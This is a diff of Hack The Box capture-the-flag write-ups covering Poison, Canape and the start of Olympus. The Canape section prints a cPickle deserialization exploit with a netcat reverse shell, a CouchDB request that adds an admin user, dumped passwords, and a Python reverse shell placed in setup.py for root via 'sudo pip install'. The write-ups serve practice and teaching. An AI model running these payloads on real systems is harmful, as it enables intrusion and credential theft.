+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → file secret.zip
+ secret.zip: Zip archive data, at least v2.0 to extract
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → unzip secret.zip
+ Archive: secret.zip
+ [secret.zip] secret password:
+ extracting: secret
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat secret
+ ��[|Ֆz!
+
+
+secret seems to be an odd file, so we enumerate the box a little further, but from inside our ssh connection :
+
+
+ charix@Poison:~ % netstat -an
+ Active Internet connections (including servers)
+ Proto Recv-Q Send-Q Local Address Foreign Address (state)
+ tcp4 0 44 10.10.10.84.22 10.10.14.10.48110 ESTABLISHED
+ tcp4 0 0 127.0.0.1.25 *.* LISTEN
+ tcp4 0 0 *.80 *.* LISTEN
+ tcp6 0 0 *.80 *.* LISTEN
+ tcp4 0 0 *.22 *.* LISTEN
+ tcp6 0 0 *.22 *.* LISTEN
+ tcp4 0 0 127.0.0.1.5801 *.* LISTEN
+ tcp4 0 0 127.0.0.1.5901 *.* LISTEN
+ udp4 0 0 *.514 *.*
+ udp6 0 0 *.514 *.*
+
+
+It looks like we have 2 ports : 5801 and 5901 listening on the localhost address, These 2 ports may show us that there is a VNC service for us to exploit, so we'll assume that secret is a crackable VPC password using vncpwd which gives us this password:
+
+
+ VNCP@$$!
+
+
+Although these 2 ports are not available for us (remote attacker) we need to re-direct the traffic to us somehow.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nc 10.10.10.84 5904
+ Ncat: Connection refused.
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nc 10.10.10.84 5901
+ Ncat: Connection refused.
+
+
+
+To do so we'll create a FIFO file inside /tmp to redirect , and forward the vnc connection to the correct port, To connect there, we'll use vncviewer to connect on port 5904 which is the fourth client:
+
+
+
+And that's it ! we have been able to print out the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/25.md b/Medium/25.md
new file mode 100644
index 0000000..f017cae
--- /dev/null
+++ b/Medium/25.md
@@ -0,0 +1,584 @@
+# Canape Writeup
+
+
+
+## Introduction :
+
+Canape is a Medium linux box released back in April 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -F 10.10.10.70 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 07:34 GMT
+ Nmap scan report for 10.10.10.70
+ Host is up (0.094s latency).
+ Not shown: 8319 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -sCV -p80 10.10.10.70
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 07:35 GMT
+ Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
+ Nmap done: 1 IP address (0 hosts up) scanned in 3.88 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -sCV -p80 10.10.10.70 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 07:35 GMT
+ Nmap scan report for 10.10.10.70
+ Host is up.
+
+ PORT STATE SERVICE VERSION
+ 80/tcp filtered http
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 2.88 seconds
+
+ λ nihilist [ 10.10.14.5/23 ] [~/_HTB/Canape]
+ → nmap -sCV 10.10.10.70
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 08:42 GMT
+ Nmap scan report for 10.10.10.70
+ Host is up (0.042s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ | http-git:
+ | 10.10.10.70:80/.git/
+ | Git repository found!
+ | Repository description: Unnamed repository; edit this file 'description' to name the...
+ | Last commit message: final # Please enter the commit message for your changes. Li...
+ | Remotes:
+ |_ http://git.canape.htb/simpsons.git
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Simpsons Fan Site
+ |_http-trane-info: Problem with XML parsing of /evox/about
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.21 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up port 80 running http, so let's investigate it :
+
+
+
+Trying to dirsearch the website gives off quite strange results, since every request gives back a 200 status code, so our best bet at finding which really is a successful response is by looking at the size of the response we get most notably those that are not 3KB. Although after fiddling with it a bit, we see that even those that are AND are not 3KB are not even consistent in their responses, it really looks like an unstable webserver.
+
+
+
+Although from this mess, we still see that we are dealing with a CouchDB website. Our nmap scan picked up a github repository in /.git/ aswell as a domain name : canape.htb with it's subdomain git.canape.htb so before we investigate all those, we add the correct line in our /etc/hosts file and use wfuzz to check what's going on with those 200 status codes:
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → echo '10.10.10.70 canape.htb' >> /etc/hosts
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → ping canape.htb
+ PING canape.htb (10.10.10.70) 56(84) bytes of data.
+ 64 bytes from canape.htb (10.10.10.70): icmp_seq=1 ttl=63 time=65.3 ms
+ 64 bytes from canape.htb (10.10.10.70): icmp_seq=2 ttl=63 time=57.0 ms
+ ^C
+
+
+
+Now that we added it to our /etc/hosts file let's wfuzz the webservice:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.70/FUZZ
+
+ Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+
+ ********************************************************
+ * Wfuzz 2.4.5 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.70/FUZZ
+ Total requests: 220560
+
+ ===================================================================
+ ID Response Lines Word Chars Payload
+ ===================================================================
+
+ 000000010: 200 82 L 237 W 3076 Ch "#"
+ 000000007: 200 82 L 237 W 3076 Ch "# license, visit http://creativecommons.org/lic
+ enses/by-sa/3.0/"
+ 000000004: 200 82 L 237 W 3076 Ch "#"
+ 000000005: 200 82 L 237 W 3076 Ch "# This work is licensed under the Creative Comm
+ ons"
+ 000000009: 200 82 L 237 W 3076 Ch "# Suite 300, San Francisco, California, 94105,
+ USA."
+ 000000006: 200 82 L 237 W 3076 Ch "# Attribution-Share Alike 3.0 License. To view
+ a copy of this"
+ 000000003: 200 82 L 237 W 3076 Ch "# Copyright 2007 James Fisher"
+ 000000002: 200 82 L 237 W 3076 Ch "#"
+ 000000008: 200 82 L 237 W 3076 Ch "# or send a letter to Creative Commons, 171 Sec
+ ond Street,"
+ 000000001: 200 82 L 237 W 3076 Ch "# directory-list-2.3-medium.txt"
+ 000000012: 200 82 L 237 W 3076 Ch "# on atleast 2 different hosts"
+ 000000011: 200 82 L 237 W 3076 Ch "# Priority ordered case sensative list, where e
+ ntries were found"
+ 000000013: 200 82 L 237 W 3076 Ch "#"
+ 000000015: 200 0 L 1 W 52 Ch "index"
+ 000000016: 200 82 L 237 W 3076 Ch "images"
+ 000000014: 200 82 L 237 W 3076 Ch ""
+ 000000019: 200 82 L 237 W 3076 Ch "news"
+ 000000020: 200 0 L 1 W 227 Ch "crack"
+ 000000017: 200 82 L 237 W 3076 Ch "download"
+ 000000018: 200 82 L 237 W 3076 Ch "2006"
+ 000000022: 200 0 L 1 W 185 Ch "warez"
+ 000000023: 200 0 L 1 W 210 Ch "full"
+ 000000021: 200 82 L 237 W 3076 Ch "serial"
+ 000000024: 200 82 L 237 W 3076 Ch "12"
+ 000000025: 200 0 L 1 W 138 Ch "contact"
+ 000000027: 200 82 L 237 W 3076 Ch "search"
+ 000000028: 200 0 L 1 W 171 Ch "spacer"
+ 000000029: 200 0 L 1 W 193 Ch "privacy"
+ 000000026: 200 82 L 237 W 3076 Ch "about"
+ 000000030: 200 0 L 1 W 169 Ch "11"
+ 000000031: 200 0 L 1 W 73 Ch "logo"
+ 000000032: 200 82 L 237 W 3076 Ch "blog"
+ 000000033: 200 0 L 1 W 180 Ch "new"
+ 000000034: 200 82 L 237 W 3076 Ch "10"
+ 000000036: 200 82 L 237 W 3076 Ch "faq"
+ 000000037: 200 0 L 1 W 149 Ch "rss"
+ 000000038: 200 0 L 1 W 173 Ch "home"
+ 000000040: 200 0 L 1 W 185 Ch "default"
+ 000000039: 200 82 L 237 W 3076 Ch "img"
+ 000000035: 200 82 L 237 W 3076 Ch "cgi-bin"
+ 000000041: 200 0 L 1 W 197 Ch "2005"
+ 000000043: 200 0 L 1 W 116 Ch "sitemap"
+ 000000042: 200 82 L 237 W 3076 Ch "products"
+ 000000044: 200 82 L 237 W 3076 Ch "archives"
+ 000000045: 200 82 L 237 W 3076 Ch "1"
+ 000000047: 200 0 L 1 W 90 Ch "links"
+ 000000046: 200 82 L 237 W 3076 Ch "09"
+ 000000051: 200 82 L 237 W 3076 Ch "2"
+ 000000049: 200 0 L 1 W 233 Ch "08"
+ 000000050: 200 0 L 1 W 93 Ch "06"
+ 000000048: 200 82 L 237 W 3076 Ch "01"
+ 000000052: 200 0 L 1 W 193 Ch "07"
+ 000000053: 200 82 L 237 W 3076 Ch "login"
+ 000000054: 200 0 L 1 W 184 Ch "articles"
+ 000000055: 200 82 L 237 W 3076 Ch "support"
+ 000000057: 200 82 L 237 W 3076 Ch "keygen"
+ 000000058: 200 0 L 1 W 208 Ch "article"
+ 000000060: 200 82 L 237 W 3076 Ch "03"
+ 000000059: 200 82 L 237 W 3076 Ch "04"
+ 000000056: 200 82 L 237 W 3076 Ch "05"
+ 000000062: 200 0 L 1 W 233 Ch "events"
+ 000000061: 200 82 L 237 W 3076 Ch "help"
+ 000000063: 200 0 L 1 W 110 Ch "archive"
+ 000000064: 200 0 L 1 W 135 Ch "02"
+ 000000065: 200 0 L 1 W 89 Ch "register"
+ 000000067: 200 0 L 1 W 114 Ch "forum"
+ 000000066: 200 0 L 1 W 218 Ch "en"
+ 000000069: 200 82 L 237 W 3076 Ch "downloads"
+ 000000068: 200 82 L 237 W 3076 Ch "software"
+ 000000072: 200 0 L 1 W 161 Ch "13"
+ 000000073: 200 0 L 1 W 63 Ch "category"
+ 000000070: 200 0 L 1 W 123 Ch "3"
+ 000000071: 200 0 L 1 W 124 Ch "security"
+ 000000074: 200 0 L 1 W 99 Ch "4"
+ 000000076: 200 0 L 1 W 149 Ch "14"
+ ^C
+
+
+
+So we'll rule out the 1Word requests using the --hw flag (hide words):
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wfuzz --hw 1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.70/FUZZ
+
+
+But we also see that we get 3076 characters, so let's change it accordingly using the --hh flag (hide characters):
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wfuzz --hw 1 --hh 3076 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.70/FUZZ
+
+
+While that runs we'll send a quote and intercept it with burp (foxyproxy + intercepter) and then send it to the repeater (CTRL+R) and go there (CTRL+SHIFT+R)
+
+  
+
+Once the request is saved we can start running another enumerating process in the background (here: wfuzz + sqlmap) 
+
+So from here, we'll check the /check directory using burpsuite. Sqlmap returned that quote isn't injectable. Let's send the intercepted /check request to the repeater :
+
+
+
+However after fuzzing around with /check a bit in burpsuite we get 405 errors : methods not allowed.
+
+Instead let's move over to the .git directory our nmap scan found earlier :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → git clone http://git.canape.htb/simpsons.git
+ Cloning into 'simpsons'...
+ fatal: unable to access 'http://git.canape.htb/simpsons.git/': Could not resolve host: git.canape.htb
+
+
+Now doing so gives us an error because we didn't add the correct line at the end of our /etc/hosts file , we need to add BOTH canape.htb and git.canape.htb
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Canape]
+ → nano /etc/hosts
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → git clone http://git.canape.htb/simpsons.git
+ Cloning into 'simpsons'...
+ remote: Counting objects: 49, done.
+ remote: Compressing objects: 100% (47/47), done.
+ remote: Total 49 (delta 18), reused 0 (delta 0)
+ Unpacking objects: 100% (49/49), 163.16 KiB | 262.00 KiB/s, done.
+
+
+
+Once that's done, we git clone the repository and take a look into it for interesting files, beforehand you can cd into simpsons, and type in **git log** to know which commits have been done so let's do it and we see an interesting commit :
+
+
+ commit a389475a903520abba71a5c9b2fa0a15686c8fbb
+ Author: Homer Simpson <****homerj0121@outlook.com>
+ Date: Sat Jan 20 07:26:43 2018 -0800
+
+ trollface
+
+ commit f9be9a9a7b217f67923ec22b360de313854b6ab6
+ Author: Homer Simpson <****homerj0121@outlook.com>
+ Date: Mon Jan 15 18:48:16 2018 -0800
+
+ add note**commit c8a74a098a60aaea1af98945bd707a7eab0ff4b0**
+ Author: Homer Simpson <****homerj0121@outlook.com>
+ Date: Mon Jan 15 18:46:30 2018 -0800
+
+ temporarily hide check due to vulerability
+ :
+
+let's investigate the last commit (c8a74a098a60aaea1af98945bd707a7eab0ff4b0) which says something about a vulnerability :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [_HTB/Canape/simpsons] at master ✔
+ → git diff c8a74a098a60aaea1af98945bd707a7eab0ff4b0
+
+
+So we run the aforementionned command, and we have a few interesting changes, most notably into /submit's submit python function :
+
+
+
+Instead of sending the quote into cPickle, it goes into a file which is md5 hashed. So we're taking the character and quote user input from the http page whose characters are into the WHITELIST and they must be lowercase. which creates the ID by making a md5sum whose hex is going to be digested.
+
+
+ md5sum(char+quote) is equal to the p_id
+
+
+So the idea here is to open a file whose pid consists of a md5sum of the username and the quote whose characters are in the whitelist, using the check webpage into which cPickle library functions are being called to load the data, so we know that we have a cPickle vulnerability. Essentially, cPickle is like a python serialization, and some things do not serialize well, and basically, cPickle calls a python function:
+
+
+ def __reduce__(self):
+ import os
+ return (os.system,(COMMAND,))
+
+
+In order to clean it up as it does pickling, The exploit is that we serialize a nu reduce call so that once cPickle calls the __reduce__ function it calls the code we just submitted. so let's create the exploit ourselves :
+
+
+ import cPickle
+ from hashlib import md5
+ import requests
+
+ class IppsecRocks(object):
+ def __reduce__(self):
+ return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f',))
+
+ sc = cPickle.dumps(IppsecRocks()) # pickle up the IppsecRocks class,
+ print sc
+
+
+Now that's the skeletton of our exploit, which contains the reverse shell one liner pointing at our port 1234, we pickle up the class itself, and we print it to see if it works. So let's test it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → python2 exploit.py
+ cposix
+ system
+ p1
+ (S'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f'
+ p2
+ tp3
+ Rp4
+ .
+
+
+And it gets pickled correctly, so let's continue by following the code we found in our previous git diff cmd: we'll keep in mind that the box is going to md5sum both the character and the quote together, so we need to add an echo command WITHIN the pickle payload:
+
+
+ import cPickle
+ from hashlib import md5
+ import requests
+
+ class IppsecRocks(object):
+ def __reduce__(self):
+ return (os.system, ('echo homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f',))
+
+ sc = cPickle.dumps(IppsecRocks()) # pickle up the IppsecRocks class,
+ #print sc
+ char,quote = sc.split("!")
+
+ print "[+] ------ SPLITTING ------ [+]"
+ print char
+ print "[+] ------ STRING 2 ------- [+]"
+ print quote
+
+
+Now whenever we print out this pickle, it will split it up into 2. So let's test it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → python2 exploit.py
+ [+] ------ SPLITTING ------ [+]
+ **cposix
+ system
+ p1
+ (S'echo homer**
+ [+] ------ STRING 2 ------- [+]
+ ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f'
+ p2
+ tp3
+ Rp4
+ .
+
+
+
+So here you can see the CHARACTER highlighted, and below we'll have the actual QUOTE.
+
+
+ import os
+ import cPickle
+ from hashlib import md5
+ import requests
+
+ class IppsecRocks(object):
+ def __reduce__(self):
+ return (os.system, ('echo homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f',))
+
+ sc = cPickle.dumps(IppsecRocks())
+ char,quote = sc.split("!")
+
+ p_id = md5(char+quote).hexdigest()
+ cPickle.loads(char+quote)
+
+
+
+So here we have our testing python script, we execute it and it gives us a reverse shell onto our local box (for testing purposes):
+
+
+
+So that's successful, now let's modify it accordingly to send the request to both /submit (with the character and quote parameters that we infected) And then finally we send a request to /check to execute the pickle we sent:
+
+
+
+And we get a reverse shell as www-data! however we do not have enough permissions to print out homer's user flag, so we need to privesc. First of all we will upgrade our reverse shell to a tty shell using python's pty.spawn() function:
+
+
+ $ python -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@canape:/home$ ps -auxww
+
+
+Looking at the results of this command, we see that we have couchdb running as root, and running as homer. so we enumerate the box further using netstat:
+
+
+ www-data@canape:/home$ netstat -alnp | grep LIST
+ netstat -alnp | grep LIST
+ (Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+ tcp 0 0 0.0.0.0:32859 0.0.0.0:* LISTEN -
+ tcp 0 0 0.0.0.0:65535 0.0.0.0:* LISTEN -
+ tcp 0 0 127.0.0.1:5984 0.0.0.0:* LISTEN -
+ tcp 0 0 127.0.0.1:5986 0.0.0.0:* LISTEN -
+ tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
+ tcp 0 0 0.0.0.0:4369 0.0.0.0:* LISTEN -
+ tcp6 0 0 :::65535 :::* LISTEN -
+ tcp6 0 0 :::4369 :::* LISTEN -
+ unix 2 [ ACC ] STREAM LISTENING 10727 - /run/systemd/journal/stdout
+ unix 2 [ ACC ] SEQPACKET LISTENING 10740 - /run/udev/control
+ unix 2 [ ACC ] STREAM LISTENING 10729 - /run/systemd/fsck.progress
+ unix 2 [ ACC ] STREAM LISTENING 28181 - /var/run/apache2/cgisock.1047
+ unix 2 [ ACC ] STREAM LISTENING 13346 - /var/run/dbus/system_bus_socket
+ unix 2 [ ACC ] STREAM LISTENING 13347 - /run/uuidd/request
+ unix 2 [ ACC ] STREAM LISTENING 10722 - /run/systemd/private
+
+
+
+here we see that 5984 is the default port couchdb listens on. and we can verify that by using curl:
+
+
+ www-data@canape:/home$ which curl && which wget && which nc
+ which curl && which wget && which nc
+ /usr/bin/curl
+ /usr/bin/wget
+ /bin/nc
+ www-data@canape:/home$ curl 127.0.0.1:5984
+ curl 127.0.0.1:5984
+ {"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
+
+
+So we google couchdb's api documentation quickly and we can enumerate the database further accordingly :
+
+
+ www-data@canape:/home$ curl 127.0.0.1:5984/_all_dbs/
+ curl 127.0.0.1:5984/_all_dbs/
+ ["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
+
+
+
+Using the /_all_dbs/ api call we see that it has 6 databases, from which we'll search _users and passwords :
+
+
+ www-data@canape:/home$ curl 127.0.0.1:5984/_users/_all_docs
+ curl 127.0.0.1:5984/_users/_all_docs
+ {"error":"unauthorized","reason":"You are not a server admin."}
+ www-data@canape:/home$ curl 127.0.0.1:5984/passwords/_all_docs
+ curl 127.0.0.1:5984/passwords/_all_docs
+ {"error":"unauthorized","reason":"You are not authorized to access this db."}
+
+
+So we tried, but didn't go far. so since we are dealing with couchdb 2.0.0 there is a very high likelyhood that we are able to exploit this database by creating a username if we craft the corrcet curl PUT request:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → nano curl.req
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → cat curl.req
+ curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:nihilist' --data-binary '{
+ "type": "user",
+ "name": "nihilist",
+ "roles": ["_admin"],
+ "roles": [],
+ "password": "prometheus"
+ }'
+
+
+
+So this is going to create an administrator user called "nihilist" with his password "prometheus":
+
+
+ www-data@canape:/home$ curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:nihilist' --data-binary '{
+ "type": "user",
+ "name": "nihilist",
+ "roles": ["_admin"],
+ "roles": [],
+ "password": "prometheus"
+ }'
+
+ {"ok":true,"id":"org.couchdb.user:nihilist","rev":"1-9d2d3e05316aa1d30708576e370b242c"}
+
+
+So there we have it, and we are now able to print out the passwords database by specifying our username and password:
+
+
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/_all_docs
+ < --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/_all_docs
+ {"total_rows":4,"offset":0,"rows":[
+ {"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
+ {"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
+ {"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
+ {"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
+ ]}
+
+
+and we get a bunch of ids, so let's curl each one:
+
+
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
+
+ {"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d
+
+ {"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f
+
+ {"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738
+
+ {"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}
+
+
+so we have ssh with a strong password, we have couchdb passsword r3lax0Nth3COUCH, and most importantly, the homer user with his password h02ddjdj2k2k2. We can verify that homer is an user on this machine by printing out /etc/hosts, and therefore we are able to privesc to his permissions using su and his ssh password.
+
+
+ www-data@canape:/home$ cat /etc/passwd | grep homer
+ cat /etc/passwd | grep homer
+ homer:x:1000:1000:homer,,,:/home/homer:/bin/bash
+
+
+Now we verified that homer is an user on this, we login with his ssh password :
+
+
+ www-data@canape:/home$ su homer -
+ su homer -
+ Password: 0B4jyA0xtytZi7esBNGp
+
+ bash: cannot set terminal process group (-1): Inappropriate ioctl for device
+ bash: no job control in this shell
+ homer@canape:/home$ cat /home/homer/user.txt
+ cat /home/homer/user.txt
+ bcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now our first reflex here is to sudo -l as the user we privesc'd to:
+
+
+ homer@canape:/home$ cd homer
+ cd homer
+ homer@canape:~$ sudo -l
+ sudo -l
+ sudo: no tty present and no askpass program specified
+ homer@canape:~$ python -c 'import pty;pty.spawn("/bin/bash")'
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ homer@canape:~$ sudo -l
+ sudo -l
+ [sudo] password for homer: 0B4jyA0xtytZi7esBNGp
+
+ Matching Defaults entries for homer on canape:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User homer may run the following commands on canape:
+ (root) /usr/bin/pip install *
+
+
+And here we see that homer is allowed to run pip as root. All that we have to do here is create a malicious python package , then install it as root. First we create the setup.py python script containing a python reverse shell pointing at our 9002 port:
+
+
+ homer@canape:~/nihilist$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >setup.py
+
+
+then we use pip to execute our malicious setup.py file, and we catch the incoming reverse shell connection using netcat:
+
+
+
+And we get a reverse shell as root ! Therefore we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/26.md b/Medium/26.md
new file mode 100644
index 0000000..c154704
--- /dev/null
+++ b/Medium/26.md
@@ -0,0 +1,802 @@
+# Olympus Writeup
+
+
+
+## Introduction :
+
+Olympus is a Medium linux box released back in April 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 08:18 GMT
+ Nmap scan report for 10.10.10.83
+ Host is up (0.080s latency).
+ Not shown: 97 closed ports
+ PORT STATE SERVICE
+ 22/tcp filtered ssh
+ 53/tcp open domain
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p22,53,80 10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 08:19 GMT
+ Nmap scan report for 10.10.10.83
+ Host is up (0.081s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp filtered ssh
+ 53/tcp open domain (unknown banner: Bind)
+ | dns-nsid:
+ |_ bind.version: Bind
+ | fingerprint-strings:
+ | DNSVersionBindReqTCP:
+ | version
+ | bind
+ |_ Bind
+ 80/tcp open http Apache httpd
+ |_http-server-header: Apache
+ |_http-title: Crete island - Olympus HTB
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port53-TCP:V=7.80%I=7%D=3/18%Time=5E71D995%P=x86_64-pc-linux-gnu%r(DNSV
+ SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
+ SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
+ SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 27.77 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.83 -t 50 -e txt,html,php,xml -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 7124
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-18_08-20-40.log
+
+ Target: http://10.10.10.83
+
+ [08:20:40] Starting:
+ [08:20:57] 200 - 66KB - /favicon.ico
+ [08:20:59] 200 - 314B - /index.php
+ [08:20:59] 200 - 314B - /index.php/login/
+
+
+
+Let's investigate both index.php and index.php/login :
+
+
+
+We seem to get an image on /index.php so let's download it and try to see if there's any steganography involved:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → file zeus.jpg
+ zeus.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, progressive, precision 8, 480x640, components 3
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → exiftool zeus.jpg
+ ExifTool Version Number : 11.91
+ File Name : zeus.jpg
+ Directory : .
+ File Size : 36 kB
+ File Modification Date/Time : 2018:04:07 00:53:19+01:00
+ File Access Date/Time : 2020:03:18 08:29:59+00:00
+ File Inode Change Date/Time : 2020:03:18 08:29:31+00:00
+ File Permissions : rw-r--r--
+ File Type : JPEG
+ File Type Extension : jpg
+ MIME Type : image/jpeg
+ JFIF Version : 1.01
+ Resolution Unit : inches
+ X Resolution : 300
+ Y Resolution : 300
+ Image Width : 480
+ Image Height : 640
